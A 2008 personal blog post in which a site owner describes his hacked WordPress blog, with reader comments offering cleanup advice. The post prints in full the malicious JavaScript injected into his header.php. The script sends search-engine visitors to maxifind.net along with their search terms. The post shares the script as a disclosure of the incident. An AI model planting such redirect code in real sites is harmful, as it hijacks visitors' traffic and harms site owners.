Notice: This blog is no longer updated. You may find a broken link or two

You can follow my new adventures @mikeonwine

My Site was Hacked

June 19th, 2008

Apologies to any visitors that were redirected away from my site to some random search site. I’m not quite sure how, but somehow the following was injected into my wordpress ‘header.php’ file:

<script>
	var r=document.referrer,t=\"\",q;
	if(r.indexOf(\"google.\")!=-1)t=\"q\";
	if(r.indexOf(\"msn.\")!=-1)t=\"q\";
	if(r.indexOf(\"yahoo.\")!=-1)t=\"p\";
	if(r.indexOf(\"altavista.\")!=-1)t=\"q\";
	if(r.indexOf(\"aol.\")!=-1)t=\"query\";
	if(r.indexOf(\"ask.\")!=-1)t=\"q\";
	if(t.length&&((q=r.indexOf(\"?\"+t+\"=\"))!=-1||(q=r.indexOf(\"&\"+t+\"=\"))!=-1))
		window.location=\"http://maxifind.net/index.php?pf_id=361&q=\"
                                     +r.substring(q+2+t.length).split(\"&\")[0];
</script>

The way the above code works is that if a user is referred to the site via a search engine the user is immediately redirected to “maxifind.net”, which then displays ads related to the keywords from the search engine referer string. For any adnetworks out there — as this code as mostly definitely NOT inserted by me!!! Looking from traffic logs it appears as if “exit rates” spikes dramatically late last week so thankfully it’s only been up for a ccouple days.

Any suggestions as to how this happened would be appreciated. In the meantime I’ve changed all passwds and am in the process of upgrading my WordPress (which I haven’t done in a year… oops). It definitely goes to show, unless you’re going to put significant effort in maintaining your own software it’s much better to leave the hosting to someone else!

Related Posts:


Posted by Mike Filed in Uncategorized
5 Comments »

  • http://www.yardley.ca/ Greg

    Mike –

    Because WordPress is open source and widely-used it’s routinely examined for security vulnerabilities. Got to keep it up to date to minimize your chance of this stuff happening.

    I’d actually reinstall from scratch, check the .htaccess file, etc. instead of just upgrading to minimize the odds of a backdoor being present (and not overwritten by the upgrade).

    Tons of articles on this out there but this one is representative:

    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/comment-page-1/

    – Greg

  • http://justinsomnia.org/ Justin Watt

    Mike, similar thing happened to me, I don’t think it was so much a vulnerability in WP, as much as my password being exposed by Dreamhost. So word to the wise, I’d recommend changing your webhosting and WP passwords. I wrote up my experience here: Search Engine Marketeers are the new script kiddies

  • Mike

    Thanks Greg — seems all is clear. In case this happens to anybody else, it seems McAfee identifies the hacked PHP files. (Found this out when it scanned through the backup I downloaded to my laptop and I got all sorts of Virus warnings!)

    -Mike

  • Debbie D

    it could and possibly was both.. WP had had numerous vulnerabilities and several major host farms were attacked and servers infected..

    Mike.. are you us based?? I have someone doing a major article on this and needs to speak to a US based site that was recently attacked. I hope you can grab my email address from your control panel..

  • http://bizarrenews.co.uk janey

    I installed wordpress 2.6.5 on my server yesterday and 15mins ago there were lots of categories added that I had not put there. I spent 2 days working on it, then had to delete it. In the categories was crazyhorse, thanks for nothing crazyhorse